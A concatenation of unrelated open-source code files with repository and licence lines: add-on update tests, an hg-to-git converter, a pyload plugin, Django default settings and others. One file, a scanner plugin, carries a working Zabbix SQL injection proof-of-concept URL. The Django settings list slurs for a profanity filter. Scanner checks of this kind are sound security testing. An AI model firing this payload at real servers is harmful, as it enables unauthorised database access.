eq_(up.data['row']['min'], '2.0')
eq_(up.data['row']['max'], '4.0')
def test_beta_version(self):
file = File.objects.get(pk=67442)
file.status = amo.STATUS_BETA
file.save()
beta_version = '2.0.58 beta'
version = file.version
version.version = beta_version
version.save()
# Changing the status of the only reviewed file resets the
# add-on status to UNREVIEWED. Change it back to public.
version.addon.update(status=amo.STATUS_PUBLIC)
data = self.good_data.copy()
up = self.get(data)
up.is_valid()
assert not up.get_update()
data["version"] = beta_version
up = self.get(data)
up.is_valid()
up.get_update()
eq_(up.data['row']['file_id'], file.pk)
def test_no_app_version(self):
data = self.good_data.copy()
data['appVersion'] = '1.4'
up = self.get(data)
up.is_valid()
assert not up.get_update()
def test_low_app_version(self):
data = self.good_data.copy()
data['appVersion'] = '2.0'
up = self.get(data)
up.is_valid()
up.get_update()
assert up.data['row']['hash'].startswith('sha256:3808b13e')
eq_(up.data['row']['min'], '2.0')
eq_(up.data['row']['max'], '4.0')
def test_content_type(self):
up = self.get(self.good_data)
assert ('Content-Type', 'text/xml') in up.get_headers(1)
def test_cache_control(self):
up = self.get(self.good_data)
assert ('Cache-Control', 'public, max-age=3600') in up.get_headers(1)
def test_length(self):
up = self.get(self.good_data)
assert ('Cache-Length', '1') in up.get_headers(1)
def test_expires(self):
"""Check there are these headers and that expires is 3600 later."""
# We aren't going to bother testing the actual time in Expires;
# that way lies pain with broken tests later.
up = self.get(self.good_data)
hdrs = dict(up.get_headers(1))
lm = datetime(*utils.parsedate_tz(hdrs['Last-Modified'])[:7])
exp = datetime(*utils.parsedate_tz(hdrs['Expires'])[:7])
eq_((exp - lm).seconds, 3600)
def test_appguid(self):
up = self.get(self.good_data)
rdf = up.get_rdf()
assert rdf.find(self.good_data['appID']) > -1
def get_file_url(self):
"""Return the file url with the hash as parameter."""
return ('/user-media/addons/3615/delicious_bookmarks-2.1.072-fx.xpi?'
'filehash=sha256%3A3808b13ef8341378b9c8305ca648200954ee7dcd8dc'
'e09fef55f2673458bc31f')
def test_url(self):
up = self.get(self.good_data)
up.get_rdf()
assert up.data['row']['url'] == self.get_file_url()
def test_url_local_recent(self):
a_bit_ago = datetime.now() - timedelta(seconds=60)
File.objects.get(pk=67442).update(datestatuschanged=a_bit_ago)
up = self.get(self.good_data)
up.get_rdf()
assert up.data['row']['url'] == self.get_file_url()
def test_url_remote_beta(self):
file = File.objects.get(pk=67442)
file.status = amo.STATUS_BETA
file.save()
beta_version = '2.0.58 beta'
file.version.update(version=beta_version)
data = self.good_data.copy()
data["version"] = beta_version
up = self.get(data)
self.addon_one.status = amo.STATUS_PUBLIC
self.addon_one.save()
up.get_rdf()
eq_(up.data['row']['file_id'], file.pk)
assert up.data['row']['url'] == self.get_file_url()
def test_hash(self):
rdf = self.get(self.good_data).get_rdf()
assert rdf.find('updateHash') > -1
file = File.objects.get(pk=67442)
file.hash = ''
file.save()
rdf = self.get(self.good_data).get_rdf()
eq_(rdf.find('updateHash'), -1)
def test_releasenotes(self):
rdf = self.get(self.good_data).get_rdf()
assert rdf.find('updateInfoURL') > -1
version = Version.objects.get(pk=81551)
version.update(releasenotes=None)
rdf = self.get(self.good_data).get_rdf()
eq_(rdf.find('updateInfoURL'), -1)
def test_sea_monkey(self):
data = {
'id': 'bettergmail2@ginatrapani.org',
'version': '1',
'appID': '{92650c4d-4b8e-4d2a-b7eb-24ecf4f6b63a}',
'reqVersion': 1,
'appVersion': '1.0',
}
up = self.get(data)
rdf = up.get_rdf()
assert up.data['row']['hash'].startswith('sha256:9d9a389')
eq_(up.data['row']['min'], '1.0')
eq_(up.data['row']['version'], '0.5.2')
assert rdf.find(data['appID']) > -1
def test_no_updates_at_all(self):
self.addon_one.versions.all().delete()
upd = self.get(self.good_data)
eq_(upd.get_rdf(), upd.get_no_updates_rdf())
def test_no_updates_my_fx(self):
data = self.good_data.copy()
data['appVersion'] = '5.0.1'
upd = self.get(data)
eq_(upd.get_rdf(), upd.get_no_updates_rdf())
class TestFirefoxHotfix(VersionCheckMixin, amo.tests.TestCase):
def setUp(self):
"""Create a "firefox hotfix" addon with a few versions.
Check bug 1031516 for more info.
"""
super(TestFirefoxHotfix, self).setUp()
self.addon = amo.tests.addon_factory(guid='firefox-hotfix@mozilla.org')
# First signature changing hotfix.
amo.tests.version_factory(addon=self.addon, version='20121019.01',
min_app_version='10.0',
max_app_version='16.*')
# Second signature changing hotfix.
amo.tests.version_factory(addon=self.addon, version='20130826.01',
min_app_version='10.0',
max_app_version='24.*')
# Newest version compatible with any Firefox.
amo.tests.version_factory(addon=self.addon, version='20202020.01',
min_app_version='10.0',
max_app_version='30.*')
self.data = {
'id': 'firefox-hotfix@mozilla.org',
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'reqVersion': '2',
}
def test_10_16_first_hotfix(self):
"""The first hotfix changing the signature should be served."""
self.data['version'] = ''
self.data['appVersion'] = '16.0.1'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20121019.01') > -1
def test_10_16_second_hotfix(self):
"""The second hotfix changing the signature should be served."""
self.data['version'] = '20121019.01'
self.data['appVersion'] = '16.0.1'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20130826.01') > -1
def test_10_16_newest_hotfix(self):
"""The newest hotfix should be served."""
self.data['version'] = '20130826.01'
self.data['appVersion'] = '16.0.1'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20202020.01') > -1
def test_16_24_second_hotfix(self):
"""The second hotfix changing the signature should be served."""
self.data['version'] = ''
self.data['appVersion'] = '16.0.2'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20130826.01') > -1
def test_16_24_newest_hotfix(self):
"""The newest hotfix should be served."""
self.data['version'] = '20130826.01'
self.data['appVersion'] = '16.0.2'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20202020.01') > -1
def test_above_24_latest_version(self):
"""The newest hotfix should be served."""
self.data['version'] = ''
self.data['appVersion'] = '28.0'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20202020.01') > -1
|
bsd-3-clause
|
qsnake/git
|
contrib/hg-to-git/hg-to-git.py
|
47
|
7867
|
#!/usr/bin/env python
""" hg-to-git.py - A Mercurial to GIT converter
Copyright (C)2007 Stelian Pop <stelian@popies.net>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
"""
import os, os.path, sys
import tempfile, pickle, getopt
import re
# Maps hg version -> git version
hgvers = {}
# List of children for each hg revision
hgchildren = {}
# List of parents for each hg revision
hgparents = {}
# Current branch for each hg revision
hgbranch = {}
# Number of new changesets converted from hg
hgnewcsets = 0
#------------------------------------------------------------------------------
def usage():
print """\
%s: [OPTIONS] <hgprj>
options:
-s, --gitstate=FILE: name of the state to be saved/read
for incrementals
-n, --nrepack=INT: number of changesets that will trigger
a repack (default=0, -1 to deactivate)
-v, --verbose: be verbose
required:
hgprj: name of the HG project to import (directory)
""" % sys.argv[0]
#------------------------------------------------------------------------------
def getgitenv(user, date):
env = ''
elems = re.compile('(.*?)\s+<(.*)>').match(user)
if elems:
env += 'export GIT_AUTHOR_NAME="%s" ;' % elems.group(1)
env += 'export GIT_COMMITTER_NAME="%s" ;' % elems.group(1)
env += 'export GIT_AUTHOR_EMAIL="%s" ;' % elems.group(2)
env += 'export GIT_COMMITTER_EMAIL="%s" ;' % elems.group(2)
else:
env += 'export GIT_AUTHOR_NAME="%s" ;' % user
env += 'export GIT_COMMITTER_NAME="%s" ;' % user
env += 'export GIT_AUTHOR_EMAIL= ;'
env += 'export GIT_COMMITTER_EMAIL= ;'
env += 'export GIT_AUTHOR_DATE="%s" ;' % date
env += 'export GIT_COMMITTER_DATE="%s" ;' % date
return env
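# For example (hypothetical input), getgitenv('John Doe <john@example.com>', date)
# produces 'export GIT_AUTHOR_NAME="John Doe" ;export GIT_COMMITTER_NAME="John Doe" ;'
# followed by the matching email and date exports.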
#------------------------------------------------------------------------------
state = ''
opt_nrepack = 0
verbose = False
try:
opts, args = getopt.getopt(sys.argv[1:], 's:t:n:v', ['gitstate=', 'tempdir=', 'nrepack=', 'verbose'])
for o, a in opts:
if o in ('-s', '--gitstate'):
state = a
state = os.path.abspath(state)
if o in ('-n', '--nrepack'):
opt_nrepack = int(a)
if o in ('-v', '--verbose'):
verbose = True
if len(args) != 1:
raise Exception('params')
except:
usage()
sys.exit(1)
hgprj = args[0]
os.chdir(hgprj)
if state:
if os.path.exists(state):
if verbose:
print 'State does exist, reading'
f = open(state, 'r')
hgvers = pickle.load(f)
else:
print 'State does not exist, first run'
sock = os.popen('hg tip --template "{rev}"')
tip = sock.read()
if sock.close():
sys.exit(1)
if verbose:
print 'tip is', tip
# Calculate the branches
if verbose:
print 'analysing the branches...'
hgchildren["0"] = ()
hgparents["0"] = (None, None)
hgbranch["0"] = "master"
for cset in range(1, int(tip) + 1):
hgchildren[str(cset)] = ()
prnts = os.popen('hg log -r %d --template "{parents}"' % cset).read().strip().split(' ')
prnts = map(lambda x: x[:x.find(':')], prnts)
if prnts[0] != '':
parent = prnts[0].strip()
else:
parent = str(cset - 1)
hgchildren[parent] += ( str(cset), )
if len(prnts) > 1:
mparent = prnts[1].strip()
hgchildren[mparent] += ( str(cset), )
else:
mparent = None
hgparents[str(cset)] = (parent, mparent)
if mparent:
# For merge changesets, take either one, preferably the 'master' branch
if hgbranch[mparent] == 'master':
hgbranch[str(cset)] = 'master'
else:
hgbranch[str(cset)] = hgbranch[parent]
else:
# Normal changesets
# For first children, take the parent branch, for the others create a new branch
if hgchildren[parent][0] == str(cset):
hgbranch[str(cset)] = hgbranch[parent]
else:
hgbranch[str(cset)] = "branch-" + str(cset)
if not hgvers.has_key("0"):
print 'creating repository'
os.system('git init')
# loop through every hg changeset
for cset in range(int(tip) + 1):
# incremental, already seen
if hgvers.has_key(str(cset)):
continue
hgnewcsets += 1
# get info
log_data = os.popen('hg log -r %d --template "{tags}\n{date|date}\n{author}\n"' % cset).readlines()
tag = log_data[0].strip()
date = log_data[1].strip()
user = log_data[2].strip()
parent = hgparents[str(cset)][0]
mparent = hgparents[str(cset)][1]
#get comment
(fdcomment, filecomment) = tempfile.mkstemp()
csetcomment = os.popen('hg log -r %d --template "{desc}"' % cset).read().strip()
os.write(fdcomment, csetcomment)
os.close(fdcomment)
print '-----------------------------------------'
print 'cset:', cset
print 'branch:', hgbranch[str(cset)]
print 'user:', user
print 'date:', date
print 'comment:', csetcomment
if parent:
print 'parent:', parent
if mparent:
print 'mparent:', mparent
if tag:
print 'tag:', tag
print '-----------------------------------------'
# checkout the parent if necessary
if cset != 0:
if hgbranch[str(cset)] == "branch-" + str(cset):
print 'creating new branch', hgbranch[str(cset)]
os.system('git checkout -b %s %s' % (hgbranch[str(cset)], hgvers[parent]))
else:
print 'checking out branch', hgbranch[str(cset)]
os.system('git checkout %s' % hgbranch[str(cset)])
# merge
if mparent:
if hgbranch[parent] == hgbranch[str(cset)]:
otherbranch = hgbranch[mparent]
else:
otherbranch = hgbranch[parent]
print 'merging', otherbranch, 'into', hgbranch[str(cset)]
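# 'git merge -s ours' records the merge parents without changing the tree;
# the working tree is then wiped and repopulated from 'hg update -C' below.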
os.system(getgitenv(user, date) + 'git merge --no-commit -s ours "" %s %s' % (hgbranch[str(cset)], otherbranch))
# remove everything except .git and .hg directories
os.system('find . \( -path "./.hg" -o -path "./.git" \) -prune -o ! -name "." -print | xargs rm -rf')
# repopulate with the checked-out files
os.system('hg update -C %d' % cset)
# add new files
os.system('git ls-files -x .hg --others | git update-index --add --stdin')
# delete removed files
os.system('git ls-files -x .hg --deleted | git update-index --remove --stdin')
# commit
os.system(getgitenv(user, date) + 'git commit --allow-empty -a -F %s' % filecomment)
os.unlink(filecomment)
# tag
if tag and tag != 'tip':
os.system(getgitenv(user, date) + 'git tag %s' % tag)
# delete branch if not used anymore...
if mparent and len(hgchildren[str(cset)]):
print "Deleting unused branch:", otherbranch
os.system('git branch -d %s' % otherbranch)
# retrieve and record the version
vvv = os.popen('git show --quiet --pretty=format:%H').read()
print 'record', cset, '->', vvv
hgvers[str(cset)] = vvv
if hgnewcsets >= opt_nrepack and opt_nrepack != -1:
os.system('git repack -a -d')
# write the state for incrementals
if state:
if verbose:
print 'Writing state'
f = open(state, 'w')
pickle.dump(hgvers, f)
# vim: et ts=8 sw=4 sts=4
|
gpl-2.0
|
superhuahua/xunfengES
|
celerynode/vuldb/zabbix_latest_sql.py
|
4
|
1378
|
# coding:utf-8
import re
import urllib2
def get_plugin_info():
plugin_info = {
"name": "Zabbix latest SQL注入",
"info": "攻击者通过此漏洞可获取管理员权限登陆后台,后台存在执行命令功能,导致服务器被入侵控制。",
"level": "高危",
"type": "SQL注入",
"author": "wolf@YSRC",
"url": "https://github.com/Medicean/VulApps/tree/master/z/zabbix/2",
"keyword": "tag:zabbix",
"source": 1
}
return plugin_info
def check(ip, port, timeout):
try:
url = "http://" + ip + ":" + str(port)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
request = opener.open(url + "/dashboard.php", timeout=timeout)
res_html = request.read()
except:
return
if 'href="slides.php?sid=' in res_html:
m = re.search(r'href="slides\.php\?sid=(.+?)">', res_html, re.M | re.I)
if m:
sid = m.group(1)
payload = "/latest.php?output=ajax&sid={sid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=(select%20updatexml(1,concat(0x7e,(SELECT%20md5(666)),0x7e),1))".format(
sid=sid)
res_html = opener.open(url + payload, timeout=timeout).read()
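# The payload makes MySQL evaluate md5(666) inside updatexml(); finding the
# digest in the response confirms the injected subquery executed.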
if 'fae0b27c451c728867a567e8c1bb4e5' in res_html:
return u"存在SQL注入,POC:" + payload
|
gpl-3.0
|
Rusk85/pyload
|
module/plugins/accounts/UploadingCom.py
|
3
|
2038
|
# -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: mkaay
"""
from time import time, strptime, mktime
import re
from module.plugins.Account import Account
class UploadingCom(Account):
__name__ = "UploadingCom"
__version__ = "0.1"
__type__ = "account"
__description__ = """uploading.com account plugin"""
__author_name__ = ("mkaay")
__author_mail__ = ("mkaay@mkaay.de")
def loadAccountInfo(self, user, req):
src = req.load("http://uploading.com/")
premium = True
if "UPGRADE TO PREMIUM" in src:
return {"validuntil": -1, "trafficleft": -1, "premium": False}
m = re.search("Valid Until:(.*?)<", src)
if m:
validuntil = int(mktime(strptime(m.group(1).strip(), "%b %d, %Y")))
else:
validuntil = -1
return {"validuntil": validuntil, "trafficleft": -1, "premium": True}
def login(self, user, data, req):
req.cj.setCookie("uploading.com", "lang", "1")
req.cj.setCookie("uploading.com", "language", "1")
req.cj.setCookie("uploading.com", "setlang", "en")
req.cj.setCookie("uploading.com", "_lang", "en")
req.load("http://uploading.com/")
req.load("http://uploading.com/general/login_form/?JsHttpRequest=%s-xml" % long(time() * 1000),
post={"email": user, "password": data["password"], "remember": "on"})
|
gpl-3.0
|
yu-aosp-staging/android_kernel_yu_msm8916
|
arch/ia64/scripts/unwcheck.py
|
13143
|
1714
|
#!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
print "Usage: %s FILE" % sys.argv[0]
sys.exit(2)
readelf = os.getenv("READELF", "readelf")
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
if slots != rlen_sum:
global num_errors
num_errors += 1
if not func: func = "[%#x-%#x]" % (start, end)
print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
m = start_pattern.match(line)
if m:
check_func(func, slots, rlen_sum)
func = m.group(1)
start = long(m.group(2), 16)
end = long(m.group(3), 16)
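# Each 16-byte IA-64 instruction bundle holds three slots, hence 3 * (bytes / 16).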
slots = 3 * (end - start) / 16
rlen_sum = 0L
num_funcs += 1
else:
m = rlen_pattern.match(line)
if m:
rlen_sum += long(m.group(1))
check_func(func, slots, rlen_sum)
if num_errors == 0:
print "No errors detected in %u functions." % num_funcs
else:
if num_errors > 1:
err="errors"
else:
err="error"
print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
sys.exit(1)
|
gpl-2.0
|
undoware/neutron-drive
|
google_appengine/lib/django_0_96/django/conf/global_settings.py
|
30
|
11682
|
# Default Django settings. Override these with settings in the module
# pointed-to by the DJANGO_SETTINGS_MODULE environment variable.
# This is defined here as a do-nothing function because we can't import
# django.utils.translation -- that module depends on the settings.
gettext_noop = lambda s: s
####################
# CORE #
####################
DEBUG = False
TEMPLATE_DEBUG = False
# Whether to use the "Etag" header. This saves bandwidth but slows down performance.
USE_ETAGS = False
# People who get code error notifications.
# In the format (('Full Name', 'email@domain.com'), ('Full Name', 'anotheremail@domain.com'))
ADMINS = ()
# Tuple of IP addresses, as strings, that:
# * See debug comments, when DEBUG is true
# * Receive x-headers
INTERNAL_IPS = ()
# Local time zone for this installation. All choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
# Languages we provide translations for, out of the box. The language name
# should be the utf-8 encoded local name for the language.
LANGUAGES = (
('ar', gettext_noop('Arabic')),
('bn', gettext_noop('Bengali')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('cy', gettext_noop('Welsh')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('el', gettext_noop('Greek')),
('en', gettext_noop('English')),
('es', gettext_noop('Spanish')),
('es_AR', gettext_noop('Argentinean Spanish')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('gl', gettext_noop('Galician')),
('hu', gettext_noop('Hungarian')),
('he', gettext_noop('Hebrew')),
('is', gettext_noop('Icelandic')),
('it', gettext_noop('Italian')),
('ja', gettext_noop('Japanese')),
('kn', gettext_noop('Kannada')),
('lv', gettext_noop('Latvian')),
('mk', gettext_noop('Macedonian')),
('nl', gettext_noop('Dutch')),
('no', gettext_noop('Norwegian')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portuguese')),
('pt-br', gettext_noop('Brazilian')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('sl', gettext_noop('Slovenian')),
('sr', gettext_noop('Serbian')),
('sv', gettext_noop('Swedish')),
('ta', gettext_noop('Tamil')),
('te', gettext_noop('Telugu')),
('tr', gettext_noop('Turkish')),
('uk', gettext_noop('Ukrainian')),
('zh-cn', gettext_noop('Simplified Chinese')),
('zh-tw', gettext_noop('Traditional Chinese')),
)
# Languages using BiDi (right-to-left) layout
LANGUAGES_BIDI = ("he", "ar")
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Not-necessarily-technical managers of the site. They get broken link
# notifications and other various e-mails.
MANAGERS = ADMINS
# Default content type and charset to use for all HttpResponse objects, if a
# MIME type isn't manually specified. These are used to construct the
# Content-Type header.
DEFAULT_CONTENT_TYPE = 'text/html'
DEFAULT_CHARSET = 'utf-8'
# E-mail address that error messages come from.
SERVER_EMAIL = 'root@localhost'
# Whether to send broken-link e-mails.
SEND_BROKEN_LINK_EMAILS = False
# Database connection info.
DATABASE_ENGINE = '' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'ado_mssql'.
DATABASE_NAME = '' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.
DATABASE_OPTIONS = {} # Set to empty dictionary for default.
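# For example, a minimal sqlite3 configuration in a site's settings module
# might look like this (illustrative values only):
# DATABASE_ENGINE = 'sqlite3'
# DATABASE_NAME = '/path/to/mysite.db'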
# Host for sending e-mail.
EMAIL_HOST = 'localhost'
# Port for sending e-mail.
EMAIL_PORT = 25
# Optional SMTP authentication information for EMAIL_HOST.
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
# List of strings representing installed apps.
INSTALLED_APPS = ()
# List of locations of the template source files, in search order.
TEMPLATE_DIRS = ()
# List of callables that know how to import templates from various sources.
# See the comments in django/core/template/loader.py for interface
# documentation.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
# List of processors used by RequestContext to populate the context.
# Each one should be a callable that takes the request object as its
# only parameter and returns a dictionary to add to the context.
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
# 'django.core.context_processors.request',
)
# Output to use in template system for invalid (e.g. misspelled) variables.
TEMPLATE_STRING_IF_INVALID = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Default e-mail address to use for various automated correspondence from
# the site managers.
DEFAULT_FROM_EMAIL = 'webmaster@localhost'
# Subject-line prefix for email messages send with django.core.mail.mail_admins
# or ...mail_managers. Make sure to include the trailing space.
EMAIL_SUBJECT_PREFIX = '[Django] '
# Whether to append trailing slashes to URLs.
APPEND_SLASH = True
# Whether to prepend the "www." subdomain to URLs that don't have it.
PREPEND_WWW = False
# List of compiled regular expression objects representing User-Agent strings
# that are not allowed to visit any page, systemwide. Use this for bad
# robots/crawlers. Here are a few examples:
# import re
# DISALLOWED_USER_AGENTS = (
# re.compile(r'^NaverBot.*'),
# re.compile(r'^EmailSiphon.*'),
# re.compile(r'^SiteSucker.*'),
# re.compile(r'^sohu-search')
# )
DISALLOWED_USER_AGENTS = ()
ABSOLUTE_URL_OVERRIDES = {}
# Tuple of strings representing allowed prefixes for the {% ssi %} tag.
# Example: ('/home/html', '/var/www')
ALLOWED_INCLUDE_ROOTS = ()
# If this is an admin settings module, this should be a list of
# settings modules (in the format 'foo.bar.baz') for which this admin
# is an admin.
ADMIN_FOR = ()
# 404s that may be ignored.
IGNORABLE_404_STARTS = ('/cgi-bin/', '/_vti_bin', '/_vti_inf')
IGNORABLE_404_ENDS = ('mail.pl', 'mailform.pl', 'mail.cgi', 'mailform.cgi', 'favicon.ico', '.php')
# A secret key for this particular Django installation. Used in secret-key
# hashing algorithms. Set this in your settings, or Django will complain
# loudly.
SECRET_KEY = ''
# Path to the "jing" executable -- needed to validate XMLFields
JING_PATH = "/usr/bin/jing"
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = ''
# Default formatting for date objects. See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
DATE_FORMAT = 'N j, Y'
# Default formatting for datetime objects. See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
DATETIME_FORMAT = 'N j, Y, P'
# Default formatting for time objects. See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
TIME_FORMAT = 'P'
# Default formatting for date objects when only the year and month are relevant.
# See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
YEAR_MONTH_FORMAT = 'F Y'
# Default formatting for date objects when only the month and day are relevant.
# See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
MONTH_DAY_FORMAT = 'F j'
# Do you want to manage transactions manually?
# Hint: you really don't!
TRANSACTIONS_MANAGED = False
# The User-Agent string to use when checking for URL validity through the
# isExistingURL validator.
URL_VALIDATOR_USER_AGENT = "Django/0.96.2 (http://www.djangoproject.com)"
##############
# MIDDLEWARE #
##############
# List of middleware classes to use. Order is important; in the request phase,
# these middleware classes will be applied in the order given, and in the
# response phase the middleware will be applied in reverse order.
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
# 'django.middleware.http.ConditionalGetMiddleware',
# 'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.doc.XViewMiddleware',
)
############
# SESSIONS #
############
SESSION_COOKIE_NAME = 'sessionid' # Cookie name. This can be whatever you want.
SESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2 # Age of cookie, in seconds (default: 2 weeks).
SESSION_COOKIE_DOMAIN = None # A string like ".lawrence.com", or None for standard domain cookie.
SESSION_COOKIE_SECURE = False # Whether the session cookie should be secure (https:// only).
SESSION_SAVE_EVERY_REQUEST = False # Whether to save the session data on every request.
SESSION_EXPIRE_AT_BROWSER_CLOSE = False # Whether sessions expire when a user closes his browser.
#########
# CACHE #
#########
# The cache backend to use. See the docstring in django.core.cache for the
# possible values.
CACHE_BACKEND = 'simple://'
CACHE_MIDDLEWARE_KEY_PREFIX = ''
####################
# COMMENTS #
####################
COMMENTS_ALLOW_PROFANITIES = False
# The profanities that will trigger a validation error in the
# 'hasNoProfanities' validator. All of these should be in lowercase.
PROFANITIES_LIST = ('asshat', 'asshead', 'asshole', 'cunt', 'fuck', 'gook', 'nigger', 'shit')
# The group ID that designates which users are banned.
# Set to None if you're not using it.
COMMENTS_BANNED_USERS_GROUP = None
# The group ID that designates which users can moderate comments.
# Set to None if you're not using it.
COMMENTS_MODERATORS_GROUP = None
# The group ID that designates the users whose comments should be e-mailed to MANAGERS.
# Set to None if you're not using it.
COMMENTS_SKETCHY_USERS_GROUP = None
# The system will e-mail MANAGERS the first COMMENTS_FIRST_FEW comments by each
# user. Set this to 0 if you want to disable it.
COMMENTS_FIRST_FEW = 0
# A tuple of IP addresses that have been banned from participating in various
# Django-powered features.
BANNED_IPS = ()
##################
# AUTHENTICATION #
##################
AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',)
###########
# TESTING #
###########
# The name of the method to use to invoke the test suite
TEST_RUNNER = 'django.test.simple.run_tests'
# The name of the database to use for testing purposes.
# If None, a name of 'test_' + DATABASE_NAME will be assumed
TEST_DATABASE_NAME = None
############
# FIXTURES #
############
# The list of directories to search for fixtures
FIXTURE_DIRS = ()
|
bsd-3-clause
|
greyshell/Pen-Test
|
leetcode/factorial.py
|
1
|
1129
|
#!/usr/bin/python
# author: greyshell
"""
[+] problem description
=======================
find the factorial of a number
1) recursive solution
2) tail-recursive solution
[+] reference
=============
TBD
"""
def tail_recursion_driver(n):
"""
tail-recursive solution
:param n: int
:return: int
"""
return factorial_tail_recursion(n, 1) # 1 is used to start the first accumulation
def factorial_tail_recursion(n, a):
"""
better than plain recursion: a compiler/interpreter with tail-call optimization can reuse the current stack frame (note that CPython does not perform this optimization)
:param n: int
:param a: int => it accumulates the result
:return: int
"""
if n == 1 or n == 0:
return a # it carries the final result
else:
return factorial_tail_recursion(n - 1, n * a)
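# Example trace: factorial_tail_recursion(4, 1) -> (3, 4) -> (2, 12) -> (1, 24) -> returns 24.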
def factorial(n):
"""
plain recursive solution
:return: int
"""
if n == 1 or n == 0: # base case for n = 0, 1
return 1
else: # recursive case when n > 1
return n * factorial(n - 1)
def main():
print tail_recursion_driver(12)
print factorial(0)
if __name__ == '__main__':
main()
|
mit
|
bxshi/gem5
|
src/mem/slicc/ast/TypeFieldAST.py
|
92
|
1754
|
# Copyright (c) 1999-2008 Mark D. Hill and David A. Wood
# Copyright (c) 2009 The Hewlett-Packard Development Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
